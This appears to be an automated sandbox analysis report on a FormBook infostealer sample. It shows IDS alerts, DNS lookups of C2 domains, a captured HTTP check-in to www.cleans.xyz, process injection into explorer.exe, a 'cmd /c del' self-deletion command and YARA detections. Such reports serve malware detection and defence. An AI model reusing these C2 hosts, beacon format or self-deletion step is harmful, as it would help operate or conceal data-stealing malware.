                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x20000xba60c0xba80042fd04aad6990950b56a2310c89daa58False0.797321391169571data7.494852033166654IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rsrc0xbe0000x61c0x800bfced1245c18d9767e805d0a97c4c03fFalse0.33740234375data3.4550048540377016IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .reloc0xc00000xc0x20038f373e2917327444b1b1cc39b428246False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_VERSION0xbe0900x38cPGP symmetric key encrypted data - Plaintext or unencrypted data0.42290748898678415
                                                                                                                    RT_MANIFEST0xbe42c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    mscoree.dll_CorExeMain

                                                                                                                    Network Behavior

                                                                                                                    Suricata IDS Alerts

                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                    2025-01-10T15:56:25.112677+01002031412ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44986813.248.169.4880TCP
                                                                                                                    2025-01-10T15:56:25.112677+01002031449ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44986813.248.169.4880TCP
                                                                                                                    2025-01-10T15:56:25.112677+01002031453ET MALWARE FormBook CnC Checkin (GET)1192.168.2.44986813.248.169.4880TCP

                                                                                                                    Network Port Distribution

                                                                                                                    TCP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 10, 2025 15:56:24.638166904 CET4986880192.168.2.413.248.169.48
                                                                                                                    Jan 10, 2025 15:56:24.643271923 CET804986813.248.169.48192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:24.643840075 CET4986880192.168.2.413.248.169.48
                                                                                                                    Jan 10, 2025 15:56:24.644000053 CET4986880192.168.2.413.248.169.48
                                                                                                                    Jan 10, 2025 15:56:24.648725033 CET804986813.248.169.48192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:25.112427950 CET804986813.248.169.48192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:25.112606049 CET804986813.248.169.48192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:25.112637043 CET4986880192.168.2.413.248.169.48
                                                                                                                    Jan 10, 2025 15:56:25.112677097 CET4986880192.168.2.413.248.169.48
                                                                                                                    Jan 10, 2025 15:56:25.117490053 CET804986813.248.169.48192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Jan 10, 2025 15:55:43.640054941 CET5584153192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:55:43.649667978 CET53558411.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:05.405122042 CET6047053192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:56:05.415370941 CET53604701.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:24.624034882 CET6299553192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:56:24.635730982 CET53629951.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:56:45.953701019 CET5362053192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:57:19.853800058 CET6218553192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:57:19.869263887 CET53621851.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:57:40.172890902 CET5569053192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:57:40.181510925 CET53556901.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:58:00.642061949 CET5719053192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:58:00.676484108 CET53571901.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:58:21.126245975 CET5346753192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:58:21.233128071 CET53534671.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:58:41.690860033 CET5054953192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:58:41.703843117 CET53505491.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:59:02.190272093 CET5051253192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:59:02.408823967 CET53505121.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:59:25.558362007 CET5879853192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:59:25.568190098 CET53587981.1.1.1192.168.2.4
                                                                                                                    Jan 10, 2025 15:59:45.713871002 CET5050153192.168.2.41.1.1.1
                                                                                                                    Jan 10, 2025 15:59:45.722445011 CET53505011.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Jan 10, 2025 15:55:43.640054941 CET192.168.2.41.1.1.10xc1fbStandard query (0)www.orean-course-289113002.zoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:05.405122042 CET192.168.2.41.1.1.10xd1b6Standard query (0)www.6874.clubA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:24.624034882 CET192.168.2.41.1.1.10xf2e6Standard query (0)www.cleans.xyzA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:45.953701019 CET192.168.2.41.1.1.10x8d1eStandard query (0)api.msn.comA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:57:19.853800058 CET192.168.2.41.1.1.10x321eStandard query (0)www.oches-a-credito-es.bondA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:57:40.172890902 CET192.168.2.41.1.1.10xee32Standard query (0)www.yeloma-treatment-82106.bondA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:00.642061949 CET192.168.2.41.1.1.10x9fcbStandard query (0)www.araghospitality.netA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:21.126245975 CET192.168.2.41.1.1.10xf7edStandard query (0)www.ehills.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:41.690860033 CET192.168.2.41.1.1.10x530aStandard query (0)www.cskuvq.shopA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:02.190272093 CET192.168.2.41.1.1.10xa05Standard query (0)www.olnacasinotcs14.topA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:25.558362007 CET192.168.2.41.1.1.10xa9ddStandard query (0)www.attoomasteracademy.onlineA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:45.713871002 CET192.168.2.41.1.1.10x70ddStandard query (0)www.raphic-design-degree-33148.bondA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Jan 10, 2025 15:55:43.649667978 CET1.1.1.1192.168.2.40xc1fbName error (3)www.orean-course-289113002.zonenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:05.415370941 CET1.1.1.1192.168.2.40xd1b6Name error (3)www.6874.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:24.635730982 CET1.1.1.1192.168.2.40xf2e6No error (0)www.cleans.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:24.635730982 CET1.1.1.1192.168.2.40xf2e6No error (0)www.cleans.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:56:45.960436106 CET1.1.1.1192.168.2.40x8d1eNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:57:19.869263887 CET1.1.1.1192.168.2.40x321eName error (3)www.oches-a-credito-es.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:57:40.181510925 CET1.1.1.1192.168.2.40xee32Name error (3)www.yeloma-treatment-82106.bondnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:00.676484108 CET1.1.1.1192.168.2.40x9fcbName error (3)www.araghospitality.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:21.233128071 CET1.1.1.1192.168.2.40xf7edName error (3)www.ehills.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:58:41.703843117 CET1.1.1.1192.168.2.40x530aName error (3)www.cskuvq.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:02.408823967 CET1.1.1.1192.168.2.40xa05Name error (3)www.olnacasinotcs14.topnonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:25.568190098 CET1.1.1.1192.168.2.40xa9ddName error (3)www.attoomasteracademy.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                                                    Jan 10, 2025 15:59:45.722445011 CET1.1.1.1192.168.2.40x70ddName error (3)www.raphic-design-degree-33148.bondnonenoneA (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.cleans.xyz

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.44986813.248.169.48802580C:\Windows\explorer.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 10, 2025 15:56:24.644000053 CET160OUTGET /m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW HTTP/1.1
                                                                                                                    Host: www.cleans.xyz
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    Jan 10, 2025 15:56:25.112427950 CET324INHTTP/1.1 200 OK
                                                                                                                    content-type: text/html
                                                                                                                    date: Fri, 10 Jan 2025 14:56:25 GMT
                                                                                                                    content-length: 203
                                                                                                                    connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 75 54 6d 38 6c 3d 73 71 39 45 5a 69 72 79 6e 67 49 59 6c 6c 72 47 47 65 67 53 77 54 50 63 6f 53 65 47 31 77 4b 37 72 39 39 69 41 52 33 76 42 77 42 49 55 75 43 55 6f 68 4f 6d 45 5a 59 62 69 61 73 74 32 6c 41 39 4c 79 41 5a 26 65 4e 39 64 7a 3d 6e 52 2d 34 76 70 57 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW"}</script></head></html>


                                                                                                                    Statistics

                                                                                                                    CPU Usage

                                                                                                                    Click to jump to process

                                                                                                                    Memory Usage

                                                                                                                    Click to jump to process

                                                                                                                    High Level Behavior Distribution

                                                                                                                    Click to dive into process behavior distribution

                                                                                                                    Behavior

                                                                                                                    Click to jump to process

                                                                                                                    System Behavior

                                                                                                                    General

                                                                                                                    Target ID:0
                                                                                                                    Start time:09:55:06
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x280000
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704635602.0000000003659000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:2
                                                                                                                    Start time:09:55:07
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x320000
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:3
                                                                                                                    Start time:09:55:07
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Users\user\Desktop\TU0kiz3mxz.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x590000
                                                                                                                    File size:766'976 bytes
                                                                                                                    MD5 hash:5BC818A30E4D9D8A6BB828767CA1BF2A
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.1761314037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:4
                                                                                                                    Start time:09:55:08
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\Explorer.EXE
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:5
                                                                                                                    Start time:09:55:10
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\explorer.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:"C:\Windows\SysWOW64\explorer.exe"
                                                                                                                    Imagebase:0x3c0000
                                                                                                                    File size:4'514'184 bytes
                                                                                                                    MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4159606690.0000000004940000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4158012154.0000000002950000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.4159453896.0000000004910000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                    Reputation:moderate
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:6
                                                                                                                    Start time:09:55:14
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                    Wow64 process (32bit):true
                                                                                                                    Commandline:/c del "C:\Users\user\Desktop\TU0kiz3mxz.exe"
                                                                                                                    Imagebase:0x240000
                                                                                                                    File size:236'544 bytes
                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:7
                                                                                                                    Start time:09:55:14
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff70f330000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    General

                                                                                                                    Target ID:14
                                                                                                                    Start time:09:56:38
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\System32\WerFault.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\WerFault.exe -u -p 2580 -s 8648
                                                                                                                    Imagebase:0x7ff635f60000
                                                                                                                    File size:570'736 bytes
                                                                                                                    MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    General

                                                                                                                    Target ID:15
                                                                                                                    Start time:09:56:40
                                                                                                                    Start date:10/01/2025
                                                                                                                    Path:C:\Windows\explorer.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:explorer.exe
                                                                                                                    Imagebase:0x7ff72b770000
                                                                                                                    File size:5'141'208 bytes
                                                                                                                    MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                    Has elevated privileges:false
                                                                                                                    Has administrator privileges:false
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:false

                                                                                                                    Disassembly

                                                                                                                    Reset < >

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:10%
                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:139
                                                                                                                      Total number of Limit Nodes:3
                                                                                                                      execution_graph 34927 242d040 34928 242d086 34927->34928 34932 242d618 34928->34932 34936 242d628 34928->34936 34929 242d173 34933 242d628 34932->34933 34939 242d27c 34933->34939 34937 242d27c DuplicateHandle 34936->34937 34938 242d656 34937->34938 34938->34929 34940 242d690 DuplicateHandle 34939->34940 34941 242d656 34940->34941 34941->34929 34942 dbd01c 34943 dbd034 34942->34943 34944 dbd08e 34943->34944 34947 4bd2818 34943->34947 34952 4bd2808 34943->34952 34948 4bd2845 34947->34948 34949 4bd2877 34948->34949 34957 4bd2991 34948->34957 34962 4bd29a0 34948->34962 34953 4bd2845 34952->34953 34954 4bd2877 34953->34954 34955 4bd2991 2 API calls 34953->34955 34956 4bd29a0 2 API calls 34953->34956 34955->34954 34956->34954 34959 4bd29a0 34957->34959 34958 4bd2a40 34958->34949 34967 4bd2a58 34959->34967 34970 4bd2a48 34959->34970 34964 4bd29b4 34962->34964 34963 4bd2a40 34963->34949 34965 4bd2a58 2 API calls 34964->34965 34966 4bd2a48 2 API calls 34964->34966 34965->34963 34966->34963 34968 4bd2a69 34967->34968 34973 4bd4012 34967->34973 34968->34958 34971 4bd2a69 34970->34971 34972 4bd4012 2 API calls 34970->34972 34971->34958 34972->34971 34977 4bd4040 34973->34977 34981 4bd4030 34973->34981 34974 4bd402a 34974->34968 34978 4bd4082 34977->34978 34980 4bd4089 34977->34980 34979 4bd40da CallWindowProcW 34978->34979 34978->34980 34979->34980 34980->34974 34982 4bd4040 34981->34982 34983 4bd40da CallWindowProcW 34982->34983 34984 4bd4089 34982->34984 34983->34984 34984->34974 35065 2424668 35066 242467a 35065->35066 35067 2424686 35066->35067 35071 2424780 35066->35071 35076 2423e34 35067->35076 35069 24246b1 35072 24247a5 35071->35072 35080 2424890 35072->35080 35084 2424881 35072->35084 35077 2423e3f 35076->35077 35092 2425c4c 35077->35092 35079 2426feb 35079->35069 35082 24248b7 35080->35082 35081 2424994 35082->35081 35088 24244b4 35082->35088 35086 2424890 35084->35086 35085 2424994 35085->35085 35086->35085 35087 24244b4 CreateActCtxA 35086->35087 35087->35085 35089 2425920 CreateActCtxA 35088->35089 35091 24259e3 35089->35091 35093 2425c57 35092->35093 35096 2425c6c 35093->35096 35095 24270f5 35095->35079 35097 2425c77 35096->35097 35100 2425c9c 35097->35100 35099 24271da 35099->35095 35101 2425ca7 35100->35101 35102 2425ccc 2 API calls 35101->35102 35103 24272cd 35102->35103 35103->35099 34985 4bd6be0 34986 4bd6c0d 34985->34986 34989 4bd67bc 34986->34989 34988 4bd6c2e 34990 4bd67c7 34989->34990 34995 242861a 34990->34995 35002 2425ccc 34990->35002 35011 242830b 34990->35011 34991 4bd7df3 34991->34988 34996 24285cb 34995->34996 34997 242859f 34995->34997 34998 2428609 34996->34998 35024 242cd69 34996->35024 35028 242cd78 34996->35028 34997->34996 35020 242ac78 34997->35020 34998->34991 35003 2425cd7 35002->35003 35005 2428370 35003->35005 35007 242861a 2 API calls 35003->35007 35004 2428609 35004->34991 35006 24285cb 35005->35006 35010 242ac78 2 API calls 35005->35010 35006->35004 35008 242cd78 2 API calls 35006->35008 35009 242cd69 2 API calls 35006->35009 35007->35005 35008->35004 35009->35004 35010->35006 35012 2428343 35011->35012 35014 2428370 35012->35014 35019 242861a 2 API calls 35012->35019 35013 2428609 35013->34991 35015 24285cb 35014->35015 35018 242ac78 2 API calls 35014->35018 35015->35013 35016 242cd78 2 API calls 35015->35016 35017 242cd69 2 API calls 35015->35017 35016->35013 35017->35013 35018->35015 35019->35014 35032 242aca0 35020->35032 35036 242acb0 35020->35036 35021 242ac8e 35021->34996 35025 242cd78 35024->35025 35026 242cdbd 35025->35026 35051 242cf28 35025->35051 35026->34998 35029 242cd99 35028->35029 35030 242cdbd 35029->35030 35031 242cf28 2 API calls 35029->35031 35030->34998 35031->35030 35033 242acb0 35032->35033 35039 242ada8 35033->35039 35034 242acbf 35034->35021 35038 242ada8 2 API calls 35036->35038 35037 242acbf 35037->35021 35038->35037 35040 242adb9 35039->35040 35041 242addc 35039->35041 35040->35041 35042 242add4 35040->35042 35046 242b031 35040->35046 35041->35034 35042->35041 35043 242afe0 GetModuleHandleW 35042->35043 35044 242b00d 35043->35044 35044->35034 35047 242afd9 GetModuleHandleW 35046->35047 35050 242b03a 35046->35050 35049 242b00d 35047->35049 35049->35042 35050->35042 35053 242cf35 35051->35053 35052 242cf6f 35052->35026 35053->35052 35055 242bae0 35053->35055 35056 242baeb 35055->35056 35058 242dc88 35056->35058 35061 242d2dc 35056->35061 35059 2425ccc 2 API calls 35058->35059 35060 242dcf7 35058->35060 35059->35060 35060->35052 35062 242d2e7 35061->35062 35063 2425ccc 2 API calls 35062->35063 35064 242dcf7 35063->35064 35064->35058

                                                                                                                      Executed Functions

                                                                                                                      Function 0870C810 Relevance: .1, Instructions: 65COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 175608bfb173005c63c8cbd04c86ba3a5ff6705bfc2f625de2a600d07a4c848b
                                                                                                                      • Instruction ID: cf77911aa08de4bb68f11ff7c89b848804d393e05d4b846d0c98a3782f3371f4
                                                                                                                      • Opcode Fuzzy Hash: 175608bfb173005c63c8cbd04c86ba3a5ff6705bfc2f625de2a600d07a4c848b
                                                                                                                      • Instruction Fuzzy Hash: 0D21F9B1D056188BEB18CF9BD9457DEFAF7AFC8300F14C16AD409A6294DB7505468FA0
                                                                                                                      Function 0870C820 Relevance: .1, Instructions: 56COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1710746629.0000000008700000.00000040.00000800.00020000.00000000.sdmp, Offset: 08700000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_8700000_TU0kiz3mxz.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c3701fa31e223a4976b4bfb66b16e8a5d5695bbdb4bd497b2d332b5bd539c75a
